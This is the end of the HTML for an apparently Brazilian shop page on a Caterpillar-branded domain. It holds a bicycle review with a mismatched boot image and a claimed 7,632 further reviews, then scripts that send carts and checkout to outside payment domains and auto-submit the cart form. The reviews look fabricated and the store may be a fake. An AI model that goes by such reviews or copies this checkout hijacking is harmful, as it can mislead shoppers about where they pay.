						<i class="fas fa-star"></i>
					</span>
					<span class="text-yellow-500 text-sm">
						<i class="fas fa-star"></i>
					</span>
					<span class="text-yellow-500 text-sm">
						<i class="fas fa-star"></i>
					</span>
				</div>
				<p class="text-gray-700 mb-1 text-sm font-semibold">
					Variação: BICICLETA CALOI SUPRA ARO 29 ALUMÍNIO T17 2023.
				</p>
				<p class="text-gray-700 mb-2 text-2sm">
					A entrega foi rápida e o produto é de alta qualidade. Eu estou muito satisfeito!
				</p>
				<img alt="Homem vestindo botina, vista frontal" height="100" src="images/depoimento-3.png" width="100">
			</div>
			<p class="text-gray-500 text-xs font-semibold">
				Tam: Exatamente como descrito.
			</p>
			<p class="text-gray-500 text-xs font-semibold">
				HOJE - HÁ 8 MIN.
			</p>
			<hr class="my-4 border-gray-300">
			<center>
				<div class="product-brand" style="width: fit-content; padding: 5px 15px; font-weight: 600; border-radius: 15px; color: #FFFFFF; background-color: #FF0000; cursor: pointer;">+7.632 outras avaliações</div>
			</center>
		</div>
	</div>
									
	<style>
		.shopify-payment-button {display: none !important;}
		.cht-loader {
			display: none;
			position: fixed;
			width: 100%;
			height: 100%;
			background: #fff;
			left: 0;
			top: 0;
			z-index: 99999
		}
		.adooHdnEl {
			display: none;
		}
		.cht-loading {
			position: fixed;
			overflow: show;
			margin: auto;
			top: 0;
			left: 0;
			bottom: 0;
			right: 0;
			width: 50px;
			height: 50px
		}
		.cht-loading:before {
			content: '';
			display: block;
			position: fixed;
			top: 0;
			left: 0;
			width: 100%;
			height: 100%;
			background-color: rgba(255, 255, 255, .5)
		}
		.cht-loading:not(:required) {
			font: 0/0 a;
			color: transparent;
			text-shadow: none;
			background-color: transparent;
			border: 0
		}
		.cht-loading:not(:required):after {
			content: '';
			display: block;
			font-size: 10px;
			width: 50px;
			height: 50px;
			margin-top: -.5em;
			border: 5px solid #999;
			border-radius: 100%;
			border-bottom-color: transparent;
			-webkit-animation: spinner 1s linear 0s infinite;
			animation: spinner 1s linear 0s infinite
		}
		@-webkit-keyframes spinner {
			0% {
				-webkit-transform: rotate(0);
				-moz-transform: rotate(0);
				-ms-transform: rotate(0);
				-o-transform: rotate(0);
				transform: rotate(0)
			}
			100% {
				-webkit-transform: rotate(360deg);
				-moz-transform: rotate(360deg);
				-ms-transform: rotate(360deg);
				-o-transform: rotate(360deg);
				transform: rotate(360deg)
			}
		}
		@-moz-keyframes spinner {
			0% {
				-webkit-transform: rotate(0);
				-moz-transform: rotate(0);
				-ms-transform: rotate(0);
				-o-transform: rotate(0);
				transform: rotate(0)
			}
			100% {
				-webkit-transform: rotate(360deg);
				-moz-transform: rotate(360deg);
				-ms-transform: rotate(360deg);
				-o-transform: rotate(360deg);
				transform: rotate(360deg)
			}
		}
		@-o-keyframes spinner {
			0% {
				-webkit-transform: rotate(0);
				-moz-transform: rotate(0);
				-ms-transform: rotate(0);
				-o-transform: rotate(0);
				transform: rotate(0)
			}
			100% {
				-webkit-transform: rotate(360deg);
				-moz-transform: rotate(360deg);
				-ms-transform: rotate(360deg);
				-o-transform: rotate(360deg);
				transform: rotate(360deg)
			}
		}
		@keyframes spinner {
			0% {
				-webkit-transform: rotate(0);
				-moz-transform: rotate(0);
				-ms-transform: rotate(0);
				-o-transform: rotate(0);
				transform: rotate(0)
			}
			100% {
				-webkit-transform: rotate(360deg);
				-moz-transform: rotate(360deg);
				-ms-transform: rotate(360deg);
				-o-transform: rotate(360deg);
				transform: rotate(360deg)
			}
		}
	</style>
	<div class="cht-loader">
		<div class="cht-loading">
			<div class="cht-loading-spinner"></div>
		</div>
	</div>
	<script type="text/javascript">
					var cart_cookie = cht_getCookie('cart');
					var cht_hasUrlSupport = 'undefined' !== typeof URL && 'undefined' !== typeof URLSearchParams;
					var cht_utmCookieName = 'utmsTrack';
					window.chtCheckoutUrl = '';
					document.addEventListener("DOMContentLoaded", function(event) {
						let mnCartCheckoutBtn = document.querySelectorAll('[data-action="toggle-mini-cart"]');
					for (let i = 0; i < mnCartCheckoutBtn.length; i++) {mnCartCheckoutBtn[i].dataset.action = 'cht-MnCart'; mnCartCheckoutBtn[i].setAttribute('href', '/cart');}
					let a_carts = document.querySelectorAll('a[href="/cart"]');
					for(let i = 0; i < a_carts.length; i++) {a_carts[i].addEventListener('click', function () { document.location.href = '/cart' })}
					var inpSkipAdoo = document.createElement("input");
					inpSkipAdoo.setAttribute('name', 'inpSkipAdoo');
					inpSkipAdoo.setAttribute('value', 'y');
					inpSkipAdoo.setAttribute('type', 'text');
					inpSkipAdoo.setAttribute('style', 'display: none');
					//let mnCartForm = document.querySelectorAll('[id="mini-cart"]');
					let mnCartForm = [];
					for (let i = 0; i < mnCartForm.length; i++) {mnCartForm[i].setAttribute('method', 'GET'); mnCartForm[i].addEventListener('submit', fakeClick);}
        });
					var currentShopPage = 'page'
					,   chtCartEndpoint = 'https://api.finalizarcompra.io/public/shopify/cart'
					,   currentShop = 'https://caterpillar-brindes.com';
					var checkoutBtncss = '<style id="cht-btn-style" type="text/css"> body .cht-CrtpageMainFrm input[type="submit"]:not([name="update"]), body .cht-CrtpageMainFrm button[type="submit"]:not([name="update"]), body #main-cart-footer [name="checkout"]:not([class*="cht_elem_"]):not([name="update"]),  body .cht_check_mainBtn[name="checkout"]:not([class*="cht_elem_"]):not([name="update"]), body input.cht_check_mainBtn:not([class*="cht_elem_"]):not([name="update"]) {display: none !important; }body .cht-CrtpageMainFrm .cht_check_mainBtn.cht_elem_mainBtn[type="submit"]:not(.bold_hidden){display: inline-block !important; } </style>';
					function showchtLoader() {
        var el = document.querySelector('.cht-loader');
					el.style.display = 'block';
    }
					function hidechtLoader() {
        var el = document.querySelector('.cht-loader');
					el.style.display = 'none';
    }
					if (currentShopPage == 'cart') {
						showchtLoader();
					getAjax('/cart.json', function (response) {
            var cartPayload = JSON.parse(response);
					var data = {
						shop: Shopify.shop,
					origin: document.location.host,
					cart_payload: cartPayload
            };
					postAjax(chtCartEndpoint, JSON.stringify(data), function (response) {
                var resp = JSON.parse(response);
					if (!resp.active) {
						hidechtLoader();
                } else {
                  if((resp.skip_cart || window.location.href.includes('skipCart')) && cartPayload.item_count > 0) {
                        if(resp.skip_cart)
					postAjax('/cart/clear.js?revy-request=t', JSON.stringify({ }), function () {
						window.location.href = cht_getUrlWithUtms(resp.checkout_direct_url);
                                                });
					else
					window.location.href = cht_getUrlWithUtms(resp.checkout_direct_url);
					return false;
                  }
					var otherButtons = document.getElementsByClassName('cartX_check_mainBtn');

					for (var i = 0; i < otherButtons.length; i ++) {
						otherButtons[i].setAttribute('style', 'display: none !important');
                  }
					window.chtCheckoutUrl = resp.checkout_direct_url;
					var getHead = document.getElementsByTagName('head')[0];
					getHead.insertAdjacentHTML('beforeend', checkoutBtncss);
					var getForm = document.getElementsByTagName('form'); var cartFrmId,getCheckoutBtn;
					let checkoutBtnFound = false;
					for (var i = 0; i < getForm.length; i++) {
                    var formAction = getForm[i].action;  formAction = formAction.split(currentShop);
					if (formAction[0].includes('/checkout') || formAction.includes('/checkout') || ((formAction.includes('/cart')) && (!formAction.includes('cart/add'))) || ((formAction[0].includes('/cart')) && (!formAction[0].includes('cart/add')))) {
                      if (getForm[i].getAttribute('id')){
						cartFrmId = getForm[i].getAttribute('id');
                      } else {
						getForm[i].setAttribute('id', 'cht-CrtpageMainFrm'); cartFrmId = getForm[i].getAttribute('id');
                      }
					getForm[i].classList.add('cht-CrtpageMainFrm');
					getCheckoutBtn = getForm[i].elements['checkout'] || getForm[i].querySelector('a[href="/checkout"]') || getForm[i].querySelector('form[action="/cart"] input[type="submit"]')  || getForm[i].querySelector('form[action="/cart"] button[type="submit"]')  || getForm[i].querySelector('form[action="/cart"] button#cart-checkout') || getForm[i].querySelector('button[onclick="yampiClick()"]') || getForm[i].querySelector('button[name=checkout][form=cart]');
					if(!getCheckoutBtn)
					continue;
					if (getCheckoutBtn.length == undefined) {
                        if(getCheckoutBtn.getAttribute('name') == 'update') continue;
					var buttonValue = getCheckoutBtn.value ? getCheckoutBtn.value : getCheckoutBtn.textContent;
                      } else {
                        var lastBtnID = getCheckoutBtn.length - 1;
					if(getCheckoutBtn[lastBtnID].getAttribute('name') == 'update') continue;
					var buttonValue = getCheckoutBtn[lastBtnID].value ? getCheckoutBtn[lastBtnID].value : getCheckoutBtn[lastBtnID].textContent;
                      }
					checkoutBtnFound = true;
					var getSubBtnId = getCheckoutBtn.id;
					if (getSubBtnId) {
						getSubBtnId = getSubBtnId + 'chtButton';
                      } else {
						getSubBtnId = 'chtBtn';
                      }
					if (getCheckoutBtn.length == undefined) {
                        var inptBtn = `<button type='submit' class='`+getCheckoutBtn.className+` cht_check_mainBtn cht_elem_mainBtn' id='`+getSubBtnId+`'>`+buttonValue+`</button>`;
					getCheckoutBtn.insertAdjacentHTML('afterEnd', inptBtn);
                      } else {
                        var inptBtn = `<button type='submit' class='`+getCheckoutBtn[getCheckoutBtn.length - 1].className+` cht_check_mainBtn cht_elem_mainBtn' id='`+getSubBtnId+`'>`+buttonValue+`</button>`;
                        getCheckoutBtn[getCheckoutBtn.length - 1].insertAdjacentHTML('afterEnd', inptBtn);
                      }
                      document.getElementById(getSubBtnId).addEventListener('click', fakeClick);
                      let chksBtns = document.querySelectorAll('[id="'+getSubBtnId+'"]');
                      for (let i = 0; i < chksBtns.length; i++) {chksBtns[i].addEventListener('click', fakeClick);}
                      if(getForm[i].querySelector('button[onclick="yampiClick()"]') && getForm[i].querySelector('[id="'+getSubBtnId+'"]')) {
                        let bnStyle = getForm[i].querySelector('button[onclick="yampiClick()"]').getAttribute('style');
                        getForm[i].querySelector('[id="'+getSubBtnId+'"]').setAttribute('style', bnStyle);
                        getForm[i].querySelector('button[onclick="yampiClick()"]').style.display = 'none';
                      }
                    }
                  }

                  if((cartPayload.item_count == 0) || (document.querySelector('[onclick="yampiClick()"]')) || (document.querySelector('a[href="/a/checkout"]'))) {
                   }
                   else if(!checkoutBtnFound && (!document.querySelector('a[href="/a/checkout"]'))) {
                        fakeClick(new Event(null));
                   }
            hidechtLoader();
                  if (window.$ || window.jQuery) {
                    var btns = $('a.btn-checkout[href="/checkout"], button#cart-checkout').not('.cht_elem_mainBtn');
                    btns.hide();
                  }
                }
            });
        });
    }
    ["click","submit"].forEach(function(t){document.addEventListener(t,function(t){if("click"===t.type){if(event.target.matches('form[action="/cart/add"] [type=submit], form[action="/cart/add"] [type=submit] *')){event.preventDefault(),event.stopPropagation(),event.target.setAttribute("aria-busy",!0);let a=event.target.querySelector(".loader-button__loader");a&&a.removeAttribute("hidden"),document.location.href=cht_getUrlWithUtms("https://caterpillar-entrega.finalizarcompra.io/v/"+new FormData(event.target.closest("form")).get("id"))}}else"submit"===t.type&&event.target.matches('form[action="/cart/add"], form[action="/cart/add"] *')&&(event.preventDefault(),event.stopPropagation(),document.location.href=cht_getUrlWithUtms("https://caterpillar-entrega.finalizarcompra.io/v/"+new FormData(event.target).get("id")))},!1)});
    document.querySelectorAll('a.js-cart-btn-checkout[href="/checkout"]').forEach(a => a.setAttribute('href', '/cart'));
    //document.querySelectorAll('form[action="/cart/add"]').forEach(f => {f.addEventListener('submit', function () { console.log('submit'); return false;})});
  function cht_getCookie(cname) {
    let name = cname + "=";
    let decodedCookie = decodeURIComponent(document.cookie);
    let ca = decodedCookie.split(';');
    for(let i = 0; i <ca.length; i++) {
      let c = ca[i];
      while (c.charAt(0) == ' ') {
        c = c.substring(1);
      }
      if (c.indexOf(name) == 0) {
        return c.substring(name.length, c.length);
      }
    }
    return "";
  }
  function cht_setCookie(name, value, days) {
        var expires = "";
        if (days) {
            var date = new Date();
            date.setTime(date.getTime() + (days * 24 * 60 * 60 * 1000));
            expires = "; expires=" + date.toUTCString();
        }
        document.cookie = name + "=" + (value || "") + expires + "; path=/";
    }
  function yampiClick() {window.location.href = '/cart/?skipCart=1'; return false;}
  function fakeClick(event) {
        event.preventDefault();
        getAjax('/cart.json', function (response) {
            var cartPayload = JSON.parse(response);
            var data = {
                shop: Shopify.shop,
                origin: document.location.host,
                cart_payload: cartPayload
            };
            postAjax(chtCartEndpoint, JSON.stringify(data), function (response) {
                var resp = JSON.parse(response);

                window.location.href = cht_getUrlWithUtms(resp.checkout_direct_url);
            });
        });
    }
    if (window.$ || window.jQuery) {
        var oldLinks = $('a[href="/a/checkout"]').not('.cht-btn-finalize-single').addClass('cht-btn-finalize-single');

        $('.cht-btn-finalize-single').on('click', function (e) {
            e.preventDefault();

            if (currentShopPage == 'cart') {
                                window.location.href = cht_getUrlWithUtms(window.chtCheckoutUrl);

                                } else {
                                console.log('raz');
                window.location = '/cart';
            }

        });
    }
  function getAjax(url, success) {
        var xhr = window.XMLHttpRequest ? new XMLHttpRequest() : new ActiveXObject('Microsoft.XMLHTTP');
        xhr.open('GET', url);
        xhr.onreadystatechange = function() {
            if (xhr.readyState > 3 && xhr.status==200) success(xhr.responseText);
        };
        xhr.setRequestHeader('X-Requested-With', 'XMLHttpRequest');
        xhr.send();
        return xhr;
    }
    function postAjax(url, data, success) {
        var params = typeof data == 'string' ? data : Object.keys(data).map(
                function(k){ return encodeURIComponent(k) + '=' + encodeURIComponent(data[k]) }
            ).join('&');

        var xhr = window.XMLHttpRequest ? new XMLHttpRequest() : new ActiveXObject("Microsoft.XMLHTTP");

        xhr.open('POST', url);
        xhr.onreadystatechange = function() {
            if (xhr.readyState > 3 && xhr.status == 200) { success(xhr.responseText); }
        };
        xhr.setRequestHeader('X-Requested-With', 'XMLHttpRequest');
        xhr.setRequestHeader('Content-Type', 'application/json');
        xhr.send(params);

        return xhr;
    }
    function cht_getUrlWithUtms(url) {
        if (!cht_hasUrlSupport || !url) {
            return url;
        }
        var currentUrl = new URL(url),
            _ga = cht_getCookie('_ga'),
            cookiesUtms = cht_getUtms();
        cookiesUtms.forEach(function(value, key) {
            currentUrl.searchParams.set(key, value);
        });
        if (_ga) {
            currentUrl.searchParams.set('_ga', _ga);
        }
        return currentUrl.href;
    }
    function cht_getUtms() {
        var currentUtms = cht_getCookie(cht_utmCookieName);

        if (currentUtms) {
            return new URLSearchParams(currentUtms);
        }

        return new URLSearchParams();
    }
    function cht_setUtm(term, value) {
        var params = cht_getUtms();

        params.set(term, value);
        cht_setCookie(cht_utmCookieName, params.toString(), 30);
    }
    if (cht_hasUrlSupport) {
        var cht_terms = ['utm_source', 'utm_campaign', 'utm_term', 'utm_medium', 'utm_content'],
            cht_currentUrl = new URL(window.location.href),
            cht_urlParams = cht_currentUrl.searchParams;

        cht_terms.forEach(function(term) {
            if (cht_urlParams.has(term)) {
                cht_setUtm(term, cht_urlParams.get(term));
            }
        });
    }
	</script>
	<!-- start vega utm script -->
	<div id="foxScriptUtm">
		<script>
					var url_string = window.location.href;
					var url = new URL(url_string);
					var utmParams = {
						src: url.searchParams.get('src'),
					utm_source: url.searchParams.get('utm_source'),
					utm_medium: url.searchParams.get('utm_medium'),
					utm_campaign: url.searchParams.get('utm_campaign'),
					utm_term: url.searchParams.get('utm_term'),
					utm_content: url.searchParams.get('utm_content')
        }
					var cookieValue = '';
					Object.keys(utmParams).forEach(function(key) {
            if(utmParams[key]){
                if(cookieValue) {
						cookieValue += '|';
                }
					cookieValue += key + '=' + utmParams[key];
            }
        });
					if(cookieValue) {
            var cookieName = '_sirius_track';
					var myDate = new Date();
					myDate.setMonth(myDate.getMonth() + 12);
					document.cookie = cookieName +'=' + cookieValue + ';domain=.entrega-cater.com;path=/;expires=' + myDate.toUTCString();
        }
		</script>
	</div>
	<!-- end vega utm script -->
	<!-- start vega cart script -->
	<div id="foxScriptCart">
		<script defer="">
					function inArray(needle, haystack) {
            var length = haystack.length;
					for(var i = 0; i < length; i++) {
                if(haystack[i] == needle) return true;
            }
					return false;
        }
					function setFormDataCloudfoxCheckout(method = "POST") {
            const urlCloudfoxCheckout = 'https://pay.entrega-cater.com';
					let form = document.querySelector(`form[action="${urlCloudfoxCheckout}"]`);

					if(form === null) {
						form = document.querySelector('form[action="/cart"]');
					form.setAttribute('action', urlCloudfoxCheckout);
            }
					if(!form.hasAttribute('method')) form.setAttribute('method', method);
					if(!form.hasAttribute('novalidate')) form.setAttribute('novalidate','novalidate');
					if(!form.hasAttribute('data-fox')) form.setAttribute('data-fox', 'cart-form');
					return form;
        }
					function createInputDataFox(name, loopIndex, value, dataFoxNumber, type = 'hidden') {
            const element = document.createElement('input');
					element.setAttribute('type', type);
					element.setAttribute('data-fox', dataFoxNumber);
					element.setAttribute('name',`${name}${loopIndex}`);
					element.setAttribute('value',`${value}`);
            return element;
        }
        function submitCheckout(formElement) {
            const themeName = "sabino-v5-nichado-2";
            const theme = themeName.toLowerCase();
            const divFoxData = document.createElement('div');
            divFoxData.setAttribute('id', 'foxData');
            if(theme == 'warehouse') {
            } else {
            }
            // console.log(formElement);
            const form = setFormDataCloudfoxCheckout();
            form.appendChild(divFoxData);
            console.log(form);
            form.submit();
        }
        console.log('page');
        let form = document.querySelector('form[action="/cart"]');
        if(form !== null) {
            form.addEventListener('submit', function (e) {
                e.preventDefault();
                console.log(this);
                submitCheckout(this);
            });
        }
        // let buttonSubmit = document.querySelector('button[form="cart"][type="submit"]');
        let buttonSubmit = document.querySelector('button[form]');
        if(buttonSubmit !== null) {
            buttonSubmit.addEventListener('click', function (e) {
                e.preventDefault();
                console.log(form);
                submitCheckout(form);
            });
        }
		</script>
	</div>
	<!-- end vega cart script -->
	<!-- start vega skip to cart script -->
	<script>
					if(document.querySelector('button[name="add"]')) {
						let buyNowButton = document.querySelector('button[name="add"]');
					buyNowButton.querySelector("span").innerText = 'Comprar Agora'
    }
					if(document.cookie.match(new RegExp('cart=([^;]+)')) && form !== null) {
						document.getElementsByTagName('body').item(0).style.display = 'none';
					var htmlData = "<div><style>@keyframes loader-circle{0 % { transform: rotate(0) }100%{transform:rotate(360deg)}}.loader-container{height:100vh;text-align:center;padding-top:40vh}.loader{width:75px;height:75px;display:inline-block;border-top:solid #d3d3d3;border-right:solid #d3d3d3;border-bottom:solid #d3d3d3;border-left:solid #557b96;border-width:5px;border-radius:50%;animation:loader-circle 1.1s infinite linear}</style><div class='loader-container'><div class='loader'></div></div></div>";
					document.getElementsByTagName('html').item(0).insertAdjacentHTML( 'beforeend', htmlData);
					// document.querySelector('#cart_form').submit();
					submitCheckout(form);
					document.cookie = 'cart=; expires=Thu, 01 Jan 1970 00:00:00 UTC; path=/;';
    }
	</script>
	<!-- end vega skip to cart script -->

</body></html>